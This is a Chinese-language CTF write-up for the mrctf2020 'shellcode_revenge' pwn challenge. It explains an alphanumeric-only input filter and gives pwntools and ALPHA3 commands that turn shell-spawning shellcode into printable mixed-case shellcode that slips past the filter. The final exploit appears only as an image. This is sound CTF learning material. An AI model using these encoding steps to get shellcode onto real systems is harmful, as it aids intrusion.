BUU-mrctf2020_shellcode_revenge-WP(可见字符shellcode)

2020 年 11 月 23 日

1248 次浏览

750字数

这道题大概又是以为call了rax所以无法F5，不过这个的关系倒是不大，代码逻辑还是好理解的

<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201123140812.png" alt="" class="wp-image-593"style=""></figure></div>

我们要做的就是执行到右边的语句，为了执行右边我们需要执行左边的语句strlen(buf)次，也就是说buf(我们输入的字符串)中必须满足之前的条件。也就是每个字符的ASCII码必须属于(0x60,0x7A]∩(0x2F,0x5A]才会执行code。到这里之后我就不会了，于是我搜了一下<a class="no-external-link" href="https://blog.csdn.net/weixin_44145820/article/details/105565953" target="_blank">别的师傅的wp</a>，原来这个属于string.printable，就是可见字符shellcode。这里使用alpha3就可以生成了。

依据TaQini这位师傅的<a class="no-external-link" href="http://taqini.space/2020/03/31/alpha-shellcode-gen/#alpha3" target="_blank">博客</a>，我们可以使用他修改过的来生成

<pre class="wp-block-code"><code>git clone https://github.com/TaQini/alpha3.git
cd alpha3
//需要先生成普通的shellcode
vim sc.py</code></pre>

在sc.py中写

<pre class="wp-block-code"><code>from pwn import *
context.arch='amd64'#这里用64位平台做示例
sc = shellcraft.sh()#这里用shell做示例
print asm(sc)</code></pre>

然后通过

<pre class="wp-block-code"><code>python sc.py > shellcode</code></pre>

生成shellcode并通过输出重定向到shellcode将shellcode写到shellcode文件中。

然后

<pre class="wp-block-code"><code>python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"</code></pre>

即可生成64位下的rax shellcode了。

最后的exp

<figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201123142544.png" alt="" class="wp-image-594"style=""></figure>

据这位博主所言，我校也有位师傅写了针对64位的可视shellcode生成<a class="no-external-link" href="https://github.com/veritas501/ae64" target="_blank">AE64</a>

最后修改：2020 年 12 月 30 日